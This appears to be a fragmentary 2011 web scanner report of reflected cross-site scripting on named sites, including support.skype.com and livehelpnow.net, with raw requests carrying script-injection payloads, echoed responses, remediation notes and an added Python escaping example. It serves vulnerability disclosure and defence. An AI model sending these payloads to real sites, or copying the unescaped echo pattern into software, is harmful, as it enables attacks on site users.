This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:55:51 GMT Server: Apache Expires: -1 Content-Length: 4341 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E?81aab"><script>alert(1)</script>691fb0a816a=1?format=printable" rel="nofollow"> ...[SNIP]...
The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5a70"-alert(1)-"ac321b82b88 was submitted in the anId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144f5a70"-alert(1)-"ac321b82b88&pubId=19240&campId=161441 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E81A015BB8B9EE5C806AFF54FF4EB670; Path=/ Content-Type: text/javascript Date: Mon, 05 Sep 2011 02:30:54 GMT Connection: close
The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99de3"-alert(1)-"c090c6b65a8 was submitted in the campId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=19240&campId=16144199de3"-alert(1)-"c090c6b65a8 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B1AACC4AF8BC204CA4CB77100B164407; Path=/ Content-Type: text/javascript Date: Mon, 05 Sep 2011 02:30:55 GMT Connection: close
3.107. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pixel.adsafeprotected.com
Path: /jspix
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6942"-alert(1)-"91db8ff3473 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=19240&campId=161441&b6942"-alert(1)-"91db8ff3473=1 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E1323870265AF82DEF33FC529D00C2E5; Path=/ Content-Type: text/javascript Date: Mon, 05 Sep 2011 02:30:55 GMT Connection: close
The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f03b4"-alert(1)-"37599c03060 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=19240f03b4"-alert(1)-"37599c03060&campId=161441 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=29645411B817F05049B7EF8C6DEFE954; Path=/ Content-Type: text/javascript Date: Mon, 05 Sep 2011 02:30:54 GMT Connection: close
3.109. https://support.skype.com/en-us/glossary [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://support.skype.com
Path: /en-us/glossary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bffb0"><script>alert(1)</script>b13866784b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/glossary?bffb0"><script>alert(1)</script>b13866784b5=1 HTTP/1.1 Host: support.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:36:52 GMT Content-Type: text/html;charset=utf-8 Content-Language: en-US Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 68011
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.110. https://support.skype.com/en-us/search.form [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://support.skype.com
Path: /en-us/search.form
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e1fe"><script>alert(1)</script>0e4d33b11c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/search.form?5e1fe"><script>alert(1)</script>0e4d33b11c6=1 HTTP/1.1 Host: support.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.111. https://support.skype.com/en-us/search_first/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://support.skype.com
Path: /en-us/search_first/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eda5"><script>alert(1)</script>523a4c9c01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/search_first/?2eda5"><script>alert(1)</script>523a4c9c01=1 HTTP/1.1 Host: support.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:36:50 GMT Content-Type: text/html;charset=utf-8 Content-Language: en-US Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 43136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.112. https://support.skype.com/en/faqFeedback.form [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://support.skype.com
Path: /en/faqFeedback.form
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dd92"><script>alert(1)</script>b2c781f336 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/faqFeedback.form?1dd92"><script>alert(1)</script>b2c781f336=1 HTTP/1.1 Host: support.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Date: Sun, 04 Sep 2011 21:33:03 GMT Content-Type: text/html;charset=utf-8 Content-Language: en Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 42398
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.113. https://support.skype.com/en/glossary [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://support.skype.com
Path: /en/glossary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc416"><script>alert(1)</script>d582ea7c7f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/glossary?bc416"><script>alert(1)</script>d582ea7c7f7=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:32 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 67106
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.114. https://support.skype.com/en/search [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://support.skype.com
Path: /en/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5e9a"><script>alert(1)</script>ccb5065965f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eacf1"><script>alert(1)</script>f803bab4b3d was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan ...[SNIP]...
<input type="hidden" name="context" value="/search.do?q=xsseacf1"><script>alert(1)</script>f803bab4b3d"/> ...[SNIP]...
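The hidden-input snippet above shows the shape of every "name of an arbitrarily supplied request parameter" finding in this section: the application rebuilds the request URL (path plus query string) into value="..." without encoding it for the attribute context, so a parameter name containing "> closes both the attribute and the tag. The Python below is an added example written for this page, not code from support.skype.com or from the scanner. The function names, the /search.do path and the two sample query strings are assumptions; the attack string is modelled on the payload in the finding. It renders the hidden field three ways: the vulnerable concatenation, the minimum fix (HTML attribute encoding), and a layered version that also percent-encodes the rebuilt query string.

```python
"""Added example: rebuilding a request's query string into an HTML attribute.

Not code from the scanned application. Function names, the /search.do path
and the sample query strings are assumptions chosen for illustration.
"""
from html import escape
from urllib.parse import parse_qsl, urlencode

# Constructed inputs: a benign search, and the report's attribute-breakout
# payload submitted as a parameter *name* (value "1"), as in the findings.
BENIGN_QUERY = "q=xss"
ATTACK_QUERY = 'eacf1"><script>alert(1)</script>f803bab4b3d=1'


def parse_query(raw_query: str) -> list[tuple[str, str]]:
    """Split a raw query string into (name, value) pairs; keep blank values so
    a bare '?name' still round-trips."""
    return parse_qsl(raw_query, keep_blank_values=True)


def render_context_vulnerable(path: str, raw_query: str) -> str:
    """What the findings show: the URL is rebuilt by concatenation and dropped
    into value="..." untouched, so '">' in a parameter name ends the attribute
    and the <input> tag, and what follows is parsed as new markup."""
    query = "&".join(f"{name}={value}" for name, value in parse_query(raw_query))
    return f'<input type="hidden" name="context" value="{path}?{query}"/>'


def render_context_escaped(path: str, raw_query: str) -> str:
    """Minimum fix: HTML-encode the whole attribute value. quote=True turns the
    double quote into &quot; so the attribute cannot be terminated early."""
    query = "&".join(f"{name}={value}" for name, value in parse_query(raw_query))
    return f'<input type="hidden" name="context" value="{escape(path + "?" + query, quote=True)}"/>'


def render_context_hardened(path: str, raw_query: str) -> str:
    """Defence in depth: re-encode every name and value with urlencode() so the
    rebuilt URL only contains URL-safe characters, then HTML-encode the result
    for the attribute context. Either layer alone stops this payload; both
    together also keep the value a well-formed URL."""
    query = urlencode(parse_query(raw_query))
    return f'<input type="hidden" name="context" value="{escape(path + "?" + query, quote=True)}"/>'


def has_injected_tag(markup: str) -> bool:
    """Demo check: the rendered fragment should contain exactly one '<' (the
    <input> itself); any other '<' is attacker markup that survived."""
    return markup.count("<") != 1
```

Note that the benign query renders identically in all three versions; only the hardened renderings keep the attacker's input inside the attribute value, where it is inert.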
3.116. https://support.skype.com/en/search.form [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://support.skype.com
Path: /en/search.form
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fb68"><script>alert(1)</script>87e00cca4aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/search.form?7fb68"><script>alert(1)</script>87e00cca4aa=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:33:06 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 42394
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.117. https://support.skype.com/en/support_selection_after_search [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://support.skype.com
Path: /en/support_selection_after_search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d66"><script>alert(1)</script>825d2dc978e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/support_selection_after_search?33d66"><script>alert(1)</script>825d2dc978e=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:33:04 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 42410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.118. https://support.skype.com/en/tips [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://support.skype.com
Path: /en/tips
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8243"><script>alert(1)</script>1574cf5533 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/tips?b8243"><script>alert(1)</script>1574cf5533=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:16 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 44071
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the a request parameter is copied into the HTML document as plain text between tags. The payload b9dd3<script>alert(1)</script>d4467b383d0 was submitted in the a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e697"%3balert(1)//74392895200 was submitted in the n parameter. This input was echoed as 6e697";alert(1)//74392895200 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var s ...[SNIP]... Time String', e); return "00:00:00"; } }
try{
// Settings: Change these values on a per user basis
var lwp_ad_username = "w3schools";
var lwp_ad_zoneid = ljt_getZoneID();
var lwp_ad_numads = "16e697";alert(1)//74392895200";
var lwp_ad_premium = "1";// or 0 for non-premium ad
var lwp_ad_eleid = "lijit_region_128348";
var lwp_method = "regex";
var lwp_referring_search = getReferringSearch(document.referrer);
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 3ba89<img%20src%3da%20onerror%3dalert(1)>a71b4125463 was submitted in the url parameter. This input was echoed as 3ba89<img src=a onerror=alert(1)>a71b4125463 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the lhnid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ba0fc%3balert(1)//dee046ad40a was submitted in the lhnid parameter. This input was echoed as ba0fc;alert(1)//dee046ad40a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288ba0fc%3balert(1)//dee046ad40a&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c53a"%3balert(1)//9f46c8341f8 was submitted in the lhnid parameter. This input was echoed as 2c53a";alert(1)//9f46c8341f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=12882c53a"%3balert(1)//9f46c8341f8&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack='f'; var blhnInstalled=0; if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnl ...[SNIP]...
<img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=50.23.123.106|12882c53a";alert(1)//9f46c8341f8|9/4/2011 12:18:23 PM' /> ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66e04'%3balert(1)//c592964d139 was submitted in the t parameter. This input was echoed as 66e04';alert(1)//c592964d139 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f66e04'%3balert(1)//c592964d139 HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack='f66e04';alert(1)//c592964d139'; var blhnInstalled=0; if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepe ...[SNIP]...
The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 55a0d%3balert(1)//87929036ab1 was submitted in the zimg parameter. This input was echoed as 55a0d;alert(1)//87929036ab1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=5955a0d%3balert(1)//87929036ab1&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the code request parameter is copied into the HTML document as plain text between tags. The payload 1bb34<script>alert(1)</script>4e27ce41b52 was submitted in the code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the code request parameter is copied into the HTML document as plain text between tags. The payload 303c8<script>alert(1)</script>a71ebc654b was submitted in the code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d2551<script>alert(1)</script>1979d1643d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash offered ways to make another user's browser send a request containing an arbitrary HTTP header, and where such a technique is available it can probably be used to exploit this XSS flaw. For the Referer header specifically, an attacker can also influence the value by linking to the vulnerable page from a page whose own URL contains the payload, subject to the browser percent-encoding characters such as quotes and angle brackets in the URL it sends, and to the referrer policy (current browsers default to strict-origin-when-cross-origin, which sends only the origin on cross-site navigations). This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de78d"-alert(1)-"b6aa71aa6bb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash offered ways to make another user's browser send a request containing an arbitrary HTTP header, and where such a technique is available it can probably be used to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31a1d"-alert(1)-"59b4541068d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
